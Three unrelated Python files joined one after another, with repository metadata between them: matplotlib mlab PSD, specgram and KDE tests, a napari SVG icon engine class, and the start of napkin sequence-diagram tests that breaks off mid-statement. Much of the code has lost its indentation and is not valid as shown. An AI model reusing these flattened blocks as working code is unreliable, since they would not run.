Fs=self.Fs,
noverlap=0,
sides=self.sides,
detrend=detrend)
spec_b, fsp_b = mlab.psd(x=ydatab,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides,
detrend=detrend)
spec_c, fsp_c = mlab.psd(x=ycontrol,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides)
assert_array_equal(fsp_g, fsp_c)
assert_array_equal(fsp_b, fsp_c)
assert_allclose(spec_g, spec_c, atol=1e-08)
# these should not be almost equal
with pytest.raises(AssertionError):
assert_allclose(spec_b, spec_c, atol=1e-08)
def test_psd_window_hanning(self):
if self.NFFT_density is None:
return
ydata = np.arange(self.NFFT_density)
ydata1 = ydata+5
ydata2 = ydata+3.3
ycontrol1, windowVals = _apply_window(ydata1,
mlab.window_hanning,
return_window=True)
ycontrol2 = mlab.window_hanning(ydata2)
ydata = np.vstack([ydata1, ydata2])
ycontrol = np.vstack([ycontrol1, ycontrol2])
ydata = np.tile(ydata, (20, 1))
ycontrol = np.tile(ycontrol, (20, 1))
ydatab = ydata.T.flatten()
ydataf = ydata.flatten()
ycontrol = ycontrol.flatten()
spec_g, fsp_g = mlab.psd(x=ydataf,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides,
window=mlab.window_hanning)
spec_b, fsp_b = mlab.psd(x=ydatab,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides,
window=mlab.window_hanning)
spec_c, fsp_c = mlab.psd(x=ycontrol,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides,
window=mlab.window_none)
spec_c *= len(ycontrol1)/(np.abs(windowVals)**2).sum()
assert_array_equal(fsp_g, fsp_c)
assert_array_equal(fsp_b, fsp_c)
assert_allclose(spec_g, spec_c, atol=1e-08)
# these should not be almost equal
with pytest.raises(AssertionError):
assert_allclose(spec_b, spec_c, atol=1e-08)
def test_psd_window_hanning_detrend_linear(self):
if self.NFFT_density is None:
return
ydata = np.arange(self.NFFT_density)
ycontrol = np.zeros(self.NFFT_density)
ydata1 = ydata+5
ydata2 = ydata+3.3
ycontrol1 = ycontrol
ycontrol2 = ycontrol
ycontrol1, windowVals = _apply_window(ycontrol1,
mlab.window_hanning,
return_window=True)
ycontrol2 = mlab.window_hanning(ycontrol2)
ydata = np.vstack([ydata1, ydata2])
ycontrol = np.vstack([ycontrol1, ycontrol2])
ydata = np.tile(ydata, (20, 1))
ycontrol = np.tile(ycontrol, (20, 1))
ydatab = ydata.T.flatten()
ydataf = ydata.flatten()
ycontrol = ycontrol.flatten()
spec_g, fsp_g = mlab.psd(x=ydataf,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides,
detrend=mlab.detrend_linear,
window=mlab.window_hanning)
spec_b, fsp_b = mlab.psd(x=ydatab,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides,
detrend=mlab.detrend_linear,
window=mlab.window_hanning)
spec_c, fsp_c = mlab.psd(x=ycontrol,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=0,
sides=self.sides,
window=mlab.window_none)
spec_c *= len(ycontrol1)/(np.abs(windowVals)**2).sum()
assert_array_equal(fsp_g, fsp_c)
assert_array_equal(fsp_b, fsp_c)
assert_allclose(spec_g, spec_c, atol=1e-08)
# these should not be almost equal
with pytest.raises(AssertionError):
assert_allclose(spec_b, spec_c, atol=1e-08)
def test_psd_windowarray(self):
freqs = self.freqs_density
spec, fsp = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides,
window=np.ones(self.NFFT_density_real))
assert_allclose(fsp, freqs, atol=1e-06)
assert spec.shape == freqs.shape
def test_psd_windowarray_scale_by_freq(self):
win = mlab.window_hanning(np.ones(self.NFFT_density_real))
spec, fsp = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides,
window=mlab.window_hanning)
spec_s, fsp_s = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides,
window=mlab.window_hanning,
scale_by_freq=True)
spec_n, fsp_n = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides,
window=mlab.window_hanning,
scale_by_freq=False)
assert_array_equal(fsp, fsp_s)
assert_array_equal(fsp, fsp_n)
assert_array_equal(spec, spec_s)
assert_allclose(spec_s*(win**2).sum(),
spec_n/self.Fs*win.sum()**2,
atol=1e-08)
@pytest.mark.parametrize(
"kind", ["complex", "magnitude", "angle", "phase"])
def test_spectrum(self, kind):
freqs = self.freqs_spectrum
spec, fsp = getattr(mlab, f"{kind}_spectrum")(
x=self.y,
Fs=self.Fs, sides=self.sides, pad_to=self.pad_to_spectrum)
assert_allclose(fsp, freqs, atol=1e-06)
assert spec.shape == freqs.shape
if kind == "magnitude":
self.check_maxfreq(spec, fsp, self.fstims)
self.check_freqs(spec, freqs, fsp, self.fstims)
@pytest.mark.parametrize(
'kwargs',
[{}, {'mode': 'default'}, {'mode': 'psd'}, {'mode': 'magnitude'},
{'mode': 'complex'}, {'mode': 'angle'}, {'mode': 'phase'}])
def test_specgram(self, kwargs):
freqs = self.freqs_specgram
spec, fsp, t = mlab.specgram(x=self.y,
NFFT=self.NFFT_specgram,
Fs=self.Fs,
noverlap=self.nover_specgram,
pad_to=self.pad_to_specgram,
sides=self.sides,
**kwargs)
if kwargs.get('mode') == 'complex':
spec = np.abs(spec)
specm = np.mean(spec, axis=1)
assert_allclose(fsp, freqs, atol=1e-06)
assert_allclose(t, self.t_specgram, atol=1e-06)
assert spec.shape[0] == freqs.shape[0]
assert spec.shape[1] == self.t_specgram.shape[0]
if kwargs.get('mode') not in ['complex', 'angle', 'phase']:
# using a single freq, so all time slices should be about the same
if np.abs(spec.max()) != 0:
assert_allclose(
np.diff(spec, axis=1).max() / np.abs(spec.max()), 0,
atol=1e-02)
if kwargs.get('mode') not in ['angle', 'phase']:
self.check_freqs(specm, freqs, fsp, self.fstims)
def test_specgram_warn_only1seg(self):
"""Warning should be raised if len(x) <= NFFT."""
with pytest.warns(UserWarning, match="Only one segment is calculated"):
mlab.specgram(x=self.y, NFFT=len(self.y), Fs=self.Fs)
def test_psd_csd_equal(self):
Pxx, freqsxx = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides)
Pxy, freqsxy = mlab.csd(x=self.y, y=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides)
assert_array_almost_equal_nulp(Pxx, Pxy)
assert_array_equal(freqsxx, freqsxy)
@pytest.mark.parametrize("mode", ["default", "psd"])
def test_specgram_auto_default_psd_equal(self, mode):
"""
        Test that mlab.specgram without a mode, with mode 'default', and with
        mode 'psd' all give the same result.
"""
speca, freqspeca, ta = mlab.specgram(x=self.y,
NFFT=self.NFFT_specgram,
Fs=self.Fs,
noverlap=self.nover_specgram,
pad_to=self.pad_to_specgram,
sides=self.sides)
specb, freqspecb, tb = mlab.specgram(x=self.y,
NFFT=self.NFFT_specgram,
Fs=self.Fs,
noverlap=self.nover_specgram,
pad_to=self.pad_to_specgram,
sides=self.sides,
mode=mode)
assert_array_equal(speca, specb)
assert_array_equal(freqspeca, freqspecb)
assert_array_equal(ta, tb)
@pytest.mark.parametrize(
"mode, conv", [
("magnitude", np.abs),
("angle", np.angle),
("phase", lambda x: np.unwrap(np.angle(x), axis=0))
])
def test_specgram_complex_equivalent(self, mode, conv):
specc, freqspecc, tc = mlab.specgram(x=self.y,
NFFT=self.NFFT_specgram,
Fs=self.Fs,
noverlap=self.nover_specgram,
pad_to=self.pad_to_specgram,
sides=self.sides,
mode='complex')
specm, freqspecm, tm = mlab.specgram(x=self.y,
NFFT=self.NFFT_specgram,
Fs=self.Fs,
noverlap=self.nover_specgram,
pad_to=self.pad_to_specgram,
sides=self.sides,
mode=mode)
assert_array_equal(freqspecc, freqspecm)
assert_array_equal(tc, tm)
assert_allclose(conv(specc), specm, atol=1e-06)
def test_psd_windowarray_equal(self):
win = mlab.window_hanning(np.ones(self.NFFT_density_real))
speca, fspa = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides,
window=win)
specb, fspb = mlab.psd(x=self.y,
NFFT=self.NFFT_density,
Fs=self.Fs,
noverlap=self.nover_density,
pad_to=self.pad_to_density,
sides=self.sides)
assert_array_equal(fspa, fspb)
assert_allclose(speca, specb, atol=1e-08)
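# Illustrative addition (not from the original suite): the stim() fixture above
# notes that a class-scoped fixture runs on a different instance than the test
# methods, so shared state must be stored on request.cls. A minimal sketch of
# that pytest behaviour, assuming nothing beyond pytest itself:
class TestClassScopedFixtureSketch:
    @pytest.fixture(scope='class', autouse=True)
    def shared_state(self, request):
        # Setting an attribute on `self` here would be invisible to the tests;
        # the class object is the only thing the fixture and tests share.
        request.cls.shared_value = 42
    def test_sees_class_attribute(self):
        assert self.shared_value == 42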
# extra test for cohere...
def test_cohere():
N = 1024
np.random.seed(19680801)
x = np.random.randn(N)
# phase offset
y = np.roll(x, 20)
# high-freq roll-off
y = np.convolve(y, np.ones(20) / 20., mode='same')
cohsq, f = mlab.cohere(x, y, NFFT=256, Fs=2, noverlap=128)
assert_allclose(np.mean(cohsq), 0.837, atol=1.e-3)
assert np.isreal(np.mean(cohsq))
#*****************************************************************
# These tests were taken from SciPy with some minor modifications.
# They can be retrieved from:
# https://github.com/scipy/scipy/blob/master/scipy/stats/tests/test_kdeoth.py
#*****************************************************************
class TestGaussianKDE:
def test_kde_integer_input(self):
"""Regression test for #1181."""
x1 = np.arange(5)
kde = mlab.GaussianKDE(x1)
y_expected = [0.13480721, 0.18222869, 0.19514935, 0.18222869,
0.13480721]
np.testing.assert_array_almost_equal(kde(x1), y_expected, decimal=6)
def test_gaussian_kde_covariance_caching(self):
x1 = np.array([-7, -5, 1, 4, 5], dtype=float)
xs = np.linspace(-10, 10, num=5)
# These expected values are from scipy 0.10, before some changes to
# gaussian_kde. They were not compared with any external reference.
y_expected = [0.02463386, 0.04689208, 0.05395444, 0.05337754,
0.01664475]
# set it to the default bandwidth.
kde2 = mlab.GaussianKDE(x1, 'scott')
y2 = kde2(xs)
np.testing.assert_array_almost_equal(y_expected, y2, decimal=7)
def test_kde_bandwidth_method(self):
np.random.seed(8765678)
n_basesample = 50
xn = np.random.randn(n_basesample)
# Default
gkde = mlab.GaussianKDE(xn)
        # Supply a bandwidth method by name
gkde2 = mlab.GaussianKDE(xn, 'scott')
# Supply a scalar
gkde3 = mlab.GaussianKDE(xn, bw_method=gkde.factor)
xs = np.linspace(-7, 7, 51)
kdepdf = gkde.evaluate(xs)
kdepdf2 = gkde2.evaluate(xs)
assert kdepdf.all() == kdepdf2.all()
kdepdf3 = gkde3.evaluate(xs)
assert kdepdf.all() == kdepdf3.all()
class TestGaussianKDECustom:
def test_no_data(self):
"""Pass no data into the GaussianKDE class."""
with pytest.raises(ValueError):
mlab.GaussianKDE([])
def test_single_dataset_element(self):
"""Pass a single dataset element into the GaussianKDE class."""
with pytest.raises(ValueError):
mlab.GaussianKDE([42])
def test_silverman_multidim_dataset(self):
"""Test silverman's for a multi-dimensional array."""
x1 = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
with pytest.raises(np.linalg.LinAlgError):
mlab.GaussianKDE(x1, "silverman")
def test_silverman_singledim_dataset(self):
"""Test silverman's output for a single dimension list."""
x1 = np.array([-7, -5, 1, 4, 5])
mygauss = mlab.GaussianKDE(x1, "silverman")
y_expected = 0.76770389927475502
assert_almost_equal(mygauss.covariance_factor(), y_expected, 7)
def test_scott_multidim_dataset(self):
"""Test scott's output for a multi-dimensional array."""
x1 = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
with pytest.raises(np.linalg.LinAlgError):
mlab.GaussianKDE(x1, "scott")
def test_scott_singledim_dataset(self):
"""Test scott's output a single-dimensional array."""
x1 = np.array([-7, -5, 1, 4, 5])
mygauss = mlab.GaussianKDE(x1, "scott")
y_expected = 0.72477966367769553
assert_almost_equal(mygauss.covariance_factor(), y_expected, 7)
def test_scalar_empty_dataset(self):
"""Test the scalar's cov factor for an empty array."""
with pytest.raises(ValueError):
mlab.GaussianKDE([], bw_method=5)
def test_scalar_covariance_dataset(self):
"""Test a scalar's cov factor."""
np.random.seed(8765678)
n_basesample = 50
multidim_data = [np.random.randn(n_basesample) for i in range(5)]
kde = mlab.GaussianKDE(multidim_data, bw_method=0.5)
assert kde.covariance_factor() == 0.5
def test_callable_covariance_dataset(self):
"""Test the callable's cov factor for a multi-dimensional array."""
np.random.seed(8765678)
n_basesample = 50
multidim_data = [np.random.randn(n_basesample) for i in range(5)]
def callable_fun(x):
return 0.55
kde = mlab.GaussianKDE(multidim_data, bw_method=callable_fun)
assert kde.covariance_factor() == 0.55
def test_callable_singledim_dataset(self):
"""Test the callable's cov factor for a single-dimensional array."""
np.random.seed(8765678)
n_basesample = 50
multidim_data = np.random.randn(n_basesample)
kde = mlab.GaussianKDE(multidim_data, bw_method='silverman')
y_expected = 0.48438841363348911
assert_almost_equal(kde.covariance_factor(), y_expected, 7)
def test_wrong_bw_method(self):
"""Test the error message that should be called when bw is invalid."""
np.random.seed(8765678)
n_basesample = 50
data = np.random.randn(n_basesample)
with pytest.raises(ValueError):
mlab.GaussianKDE(data, bw_method="invalid")
class TestGaussianKDEEvaluate:
def test_evaluate_diff_dim(self):
"""
        Test the evaluate method when the dataset and the points have
        different dimensions.
"""
x1 = np.arange(3, 10, 2)
kde = mlab.GaussianKDE(x1)
x2 = np.arange(3, 12, 2)
y_expected = [
0.08797252, 0.11774109, 0.11774109, 0.08797252, 0.0370153
]
y = kde.evaluate(x2)
np.testing.assert_array_almost_equal(y, y_expected, 7)
def test_evaluate_inv_dim(self):
"""
Invert the dimensions; i.e., for a dataset of dimension 1 [3, 2, 4],
the points should have a dimension of 3 [[3], [2], [4]].
"""
np.random.seed(8765678)
n_basesample = 50
multidim_data = np.random.randn(n_basesample)
kde = mlab.GaussianKDE(multidim_data)
x2 = [[1], [2], [3]]
with pytest.raises(ValueError):
kde.evaluate(x2)
def test_evaluate_dim_and_num(self):
"""Tests if evaluated against a one by one array"""
x1 = np.arange(3, 10, 2)
x2 = np.array([3])
kde = mlab.GaussianKDE(x1)
y_expected = [0.08797252]
y = kde.evaluate(x2)
np.testing.assert_array_almost_equal(y, y_expected, 7)
def test_evaluate_point_dim_not_one(self):
x1 = np.arange(3, 10, 2)
x2 = [np.arange(3, 10, 2), np.arange(3, 10, 2)]
kde = mlab.GaussianKDE(x1)
with pytest.raises(ValueError):
kde.evaluate(x2)
def test_evaluate_equal_dim_and_num_lt(self):
x1 = np.arange(3, 10, 2)
x2 = np.arange(3, 8, 2)
kde = mlab.GaussianKDE(x1)
y_expected = [0.08797252, 0.11774109, 0.11774109]
y = kde.evaluate(x2)
np.testing.assert_array_almost_equal(y, y_expected, 7)
def test_psd_onesided_norm():
u = np.array([0, 1, 2, 3, 1, 2, 1])
dt = 1.0
Su = np.abs(np.fft.fft(u) * dt)**2 / (dt * u.size)
P, f = mlab.psd(u, NFFT=u.size, Fs=1/dt, window=mlab.window_none,
detrend=mlab.detrend_none, noverlap=0, pad_to=None,
scale_by_freq=None,
sides='onesided')
Su_1side = np.append([Su[0]], Su[1:4] + Su[4:][::-1])
assert_allclose(P, Su_1side, atol=1e-06)
def test_psd_oversampling():
"""Test the case len(x) < NFFT for psd()."""
u = np.array([0, 1, 2, 3, 1, 2, 1])
dt = 1.0
Su = np.abs(np.fft.fft(u) * dt)**2 / (dt * u.size)
P, f = mlab.psd(u, NFFT=u.size*2, Fs=1/dt, window=mlab.window_none,
detrend=mlab.detrend_none, noverlap=0, pad_to=None,
scale_by_freq=None,
sides='onesided')
Su_1side = np.append([Su[0]], Su[1:4] + Su[4:][::-1])
assert_almost_equal(np.sum(P), np.sum(Su_1side)) # same energy
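# Usage sketch (not part of the original suite; assumes only numpy and
# matplotlib.mlab, both imported above): locate the dominant frequency of a
# noisy sine with mlab.psd, mirroring what check_freqs() verifies for the
# parametrized cases in TestSpectral.
def _psd_usage_sketch():
    fs = 100.0
    t = np.arange(0, 10, 1 / fs)
    sig = np.sin(2 * np.pi * 4 * t) + 0.1 * np.random.randn(t.size)
    pxx, freqs = mlab.psd(sig, NFFT=256, Fs=fs)
    # the strongest bin should sit near the 4 Hz stimulus
    return freqs[pxx.argmax()]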
|
napari/_qt/qt_resources/_svg.py
|
MaksHess/napari
| 1,345 |
129552
|
"""
A Class for generating QIcons from SVGs with arbitrary colors at runtime.
"""
from functools import lru_cache
from typing import Optional, Union
from qtpy.QtCore import QByteArray, QPoint, QRect, QRectF, Qt
from qtpy.QtGui import QIcon, QIconEngine, QImage, QPainter, QPixmap
from qtpy.QtSvg import QSvgRenderer
class QColoredSVGIcon(QIcon):
"""A QIcon class that specializes in colorizing SVG files.
Parameters
----------
path_or_xml : str
Raw SVG XML or a path to an existing svg file. (Will raise error on
``__init__`` if a non-existent file is provided.)
color : str, optional
        A valid CSS color string, used to colorize the SVG, by default None.
opacity : float, optional
Fill opacity for the icon (0-1). By default 1 (opaque).
Examples
--------
>>> from napari._qt.qt_resources import QColoredSVGIcon
>>> from qtpy.QtWidgets import QLabel
# Create icon with specific color
>>> label = QLabel()
>>> icon = QColoredSVGIcon.from_resources('new_points')
>>> label.setPixmap(icon.colored('#0934e2', opacity=0.7).pixmap(300, 300))
>>> label.show()
# Create colored icon using theme
>>> label = QLabel()
>>> icon = QColoredSVGIcon.from_resources('new_points')
>>> label.setPixmap(icon.colored(theme='light').pixmap(300, 300))
>>> label.show()
"""
def __init__(
self,
path_or_xml: str,
color: Optional[str] = None,
opacity: float = 1.0,
) -> None:
from ...resources import get_colorized_svg
self._svg = path_or_xml
colorized = get_colorized_svg(path_or_xml, color, opacity)
super().__init__(SVGBufferIconEngine(colorized))
@lru_cache()
def colored(
self,
color: Optional[str] = None,
opacity: float = 1.0,
theme: Optional[str] = None,
theme_key: str = 'icon',
) -> 'QColoredSVGIcon':
"""Return a new colorized QIcon instance.
Parameters
----------
color : str, optional
A valid CSS color string, used to colorize the SVG. If provided,
will take precedence over ``theme``, by default None.
opacity : float, optional
Fill opacity for the icon (0-1). By default 1 (opaque).
theme : str, optional
            Name of the theme from which to get the `theme_key` color.
``color`` argument takes precedence.
theme_key : str, optional
If using a theme, key in the theme dict to use, by default 'icon'
Returns
-------
QColoredSVGIcon
A pre-colored QColoredSVGIcon (which may still be recolored)
"""
if not color and theme:
from ...utils.theme import get_theme
color = getattr(get_theme(theme, False), theme_key)
return QColoredSVGIcon(self._svg, color, opacity)
@staticmethod
@lru_cache()
def from_resources(
icon_name: str,
) -> 'QColoredSVGIcon':
"""Get an icon from napari SVG resources.
Parameters
----------
icon_name : str
The name of the icon svg to load (just the stem). Must be in the
napari icons folder.
Returns
-------
QColoredSVGIcon
A colorizeable QIcon
"""
from ...resources import get_icon_path
path = get_icon_path(icon_name)
return QColoredSVGIcon(path)
class SVGBufferIconEngine(QIconEngine):
"""A custom QIconEngine that can render an SVG buffer.
An icon engine provides the rendering functions for a ``QIcon``.
Each icon has a corresponding icon engine that is responsible for drawing
the icon with a requested size, mode and state. While the built-in
QIconEngine is capable of rendering SVG files, it's not able to receive the
raw XML string from memory.
This ``QIconEngine`` takes in SVG data as a raw xml string or bytes.
see: https://doc.qt.io/qt-5/qiconengine.html
"""
def __init__(self, xml: Union[str, bytes]) -> None:
if isinstance(xml, str):
xml = xml.encode('utf-8')
self.data = QByteArray(xml)
super().__init__()
def paint(self, painter: QPainter, rect, mode, state):
"""Paint the icon int ``rect`` using ``painter``."""
renderer = QSvgRenderer(self.data)
renderer.render(painter, QRectF(rect))
def clone(self):
"""Required to subclass abstract QIconEngine."""
return SVGBufferIconEngine(self.data)
def pixmap(self, size, mode, state):
"""Return the icon as a pixmap with requested size, mode, and state."""
img = QImage(size, QImage.Format_ARGB32)
img.fill(Qt.transparent)
pixmap = QPixmap.fromImage(img, Qt.NoFormatConversion)
painter = QPainter(pixmap)
self.paint(painter, QRect(QPoint(0, 0), size), mode, state)
return pixmap
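# Hedged usage sketch (not part of napari): build a QIcon straight from an
# in-memory SVG string via SVGBufferIconEngine, as the class docstring above
# describes. A QApplication must exist before pixmaps can be rendered; the
# SVG markup here is purely illustrative.
if __name__ == "__main__":
    from qtpy.QtCore import QSize
    from qtpy.QtWidgets import QApplication
    app = QApplication([])
    xml = (
        '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">'
        '<rect width="16" height="16" fill="#0934e2"/></svg>'
    )
    icon = QIcon(SVGBufferIconEngine(xml))  # QIcon takes ownership of the engine
    pixmap = icon.pixmap(QSize(64, 64))
    print("rendered", pixmap.width(), "x", pixmap.height(), "pixmap")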
|
tests/test_sd.py
|
pinetr2e/napkin
| 190 |
129573
|
import pytest
from napkin import sd
from napkin import sd_action
class TestParams:
def test_empty(self):
assert "" == str(sd.Params(tuple(), dict()))
def test_args(self):
assert "abc, def" == str(sd.Params(('abc', 'def'), dict()))
def test_args_kargs(self):
assert "abc, foo=1" == str(sd.Params(('abc',),
dict(foo=1)))
class TestBase(object):
def check(self, context, exp_actions):
actions = context._sequence
# This is for better debugging
assert str(actions) == str(exp_actions)
assert actions == exp_actions
class TestTopLevel(TestBase):
def test_call(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func()
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.ImplicitReturn(),
])
def test_call_twice(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func()
bar.func2()
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.ImplicitReturn(),
sd_action.Call(foo, bar, 'func2', sd.Params()),
sd_action.ImplicitReturn(),
])
def test_call_with_return(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func().ret('val')
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.Return(sd.Params(('val',))),
])
def test_call_with_return_twice(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func().ret('val')
bar.func2().ret('val2')
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.Return(sd.Params(('val',))),
sd_action.Call(foo, bar, 'func2', sd.Params()),
sd_action.Return(sd.Params(('val2',))),
])
def test_fail_when_separate_return_called(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func()
with pytest.raises(sd.CallError):
c.ret()
def test_fail_when_top_level_caller_set_twice(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func()
with pytest.raises(sd.TopLevelCallerError):
with foo:
bar.func()
def test_noop_when_do_nothing_in_top_level_caller(self):
c = sd.Context()
foo = c.object('foo')
with foo:
pass
self.check(c, [
])
class TestSecondLevel(TestBase):
def test_call(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
with bar.func():
baz.func2()
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.Call(bar, baz, 'func2', sd.Params()),
sd_action.ImplicitReturn(),
sd_action.ImplicitReturn(),
])
def test_call_twice(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
with bar.func():
baz.func2()
baz.func3()
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.Call(bar, baz, 'func2', sd.Params()),
sd_action.ImplicitReturn(),
sd_action.Call(bar, baz, 'func3', sd.Params()),
sd_action.ImplicitReturn(),
sd_action.ImplicitReturn(),
])
def test_call_with_return(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
with bar.func():
baz.func2().ret()
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.Call(bar, baz, 'func2', sd.Params()),
sd_action.Return(sd.Params()),
sd_action.ImplicitReturn(),
])
def test_return_from_outside_func(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
with bar.func():
baz.func2()
c.ret()
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.Call(bar, baz, 'func2', sd.Params()),
sd_action.ImplicitReturn(),
sd_action.Return(sd.Params()),
])
def test_fail_when_call_after_returning_from_outside_func(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
with bar.func():
baz.func2()
c.ret()
with pytest.raises(sd.CallError):
baz.func3()
def test_fail_when_return_again_from_outside_func(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
with bar.func():
baz.func2()
c.ret()
with pytest.raises(sd.ReturnError):
c.ret()
def test_return_from_outside_func_without_calling_any(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
with bar.func():
c.ret()
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.Return(sd.Params()),
])
def test_do_nothing_in_outside_func(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
with bar.func():
pass
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.ImplicitReturn(),
])
class TestCreate(TestBase):
def test_simple(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
c.create(bar)
self.check(c, [
sd_action.Call(foo, bar, '<<create>>', sd.Params(), flags='c'),
sd_action.ImplicitReturn(),
])
def test_non_default_method(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
c.create(bar.new())
self.check(c, [
sd_action.Call(foo, bar, 'new', sd.Params(), flags='c'),
sd_action.ImplicitReturn(),
])
def test_constructor_params(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
c.create(bar.new('a', name='bar'))
self.check(c, [
sd_action.Call(foo, bar, 'new',
params=sd.Params(('a',), dict(name='bar')),
flags='c'),
sd_action.ImplicitReturn(),
])
def test_call_others_in_constructor(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
with c.create(bar):
baz.func()
self.check(c, [
sd_action.Call(foo, bar, '<<create>>', sd.Params(), flags='c'),
sd_action.Call(bar, baz, 'func', sd.Params()),
sd_action.ImplicitReturn(),
sd_action.ImplicitReturn(),
])
def test_fail_if_called_at_top_level(self):
c = sd.Context()
with pytest.raises(sd.CreateError):
bar = c.object('bar')
c.create(bar)
def test_fail_if_create_object_already_being_used(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func()
with pytest.raises(sd.CreateError):
c.create(bar)
def test_fail_if_create_object_twice(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
c.create(bar)
with pytest.raises(sd.CreateError):
c.create(bar)
class TestDestroy(TestBase):
def test_simple(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
bar.func()
c.destroy(bar)
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.ImplicitReturn(),
sd_action.Call(foo, bar, '<<destroy>>', sd.Params(), flags='d'),
sd_action.ImplicitReturn(),
])
def test_fail_when_call_destroyed_object(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
c.destroy(bar)
with pytest.raises(sd.CallError):
bar.func()
    def test_call_other_methods_of_the_same_object_from_destructor(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
with c.destroy(bar):
bar.func()
def test_fail_when_destroy_twice_the_same_object(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
c.destroy(bar)
with pytest.raises(sd.CallError):
c.destroy(bar)
def test_fail_if_called_at_top_level(self):
c = sd.Context()
foo = c.object('foo')
with pytest.raises(sd.DestroyError):
c.destroy(foo)
class TestNote(TestBase):
def test_over_object_implicit(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
c.note('blah')
bar.func()
self.check(c, [
sd_action.Note('blah', obj=foo),
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.ImplicitReturn(),
])
def test_over_object_explicit(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
with foo:
foo.note('blah')
bar.note('blah2')
bar.func()
self.check(c, [
sd_action.Note('blah', obj=foo),
sd_action.Note('blah2', obj=bar),
sd_action.Call(foo, bar, 'func', sd.Params()),
sd_action.ImplicitReturn(),
])
def test_call_specific(self):
c = sd.Context()
foo = c.object('foo')
bar = c.object('bar')
baz = c.object('baz')
with foo:
bar.func().note('callee side note')
baz.func().note(caller='caller side note',
callee='callee side note')
baz.func2().note('note').ret('val')
self.check(c, [
sd_action.Call(foo, bar, 'func', sd.Params(),
notes=['callee side note', None]),
sd_action.ImplicitReturn(),
sd_action.Call(foo, baz, 'func', sd.Params(),
notes=['callee side note', 'caller side note']),
sd_action.ImplicitReturn(),
sd_action.Call(foo, baz, 'func2', sd.Params(),
notes=['note', None]),
sd_action.Return(sd.Params(('val',))),
])
class TestOutside(TestBase):
def test_fail_as_callee(self):
c = sd.Context()
foo = c.object('foo')
outside = c.outside()
with foo:
with pytest.raises(sd.CallError,
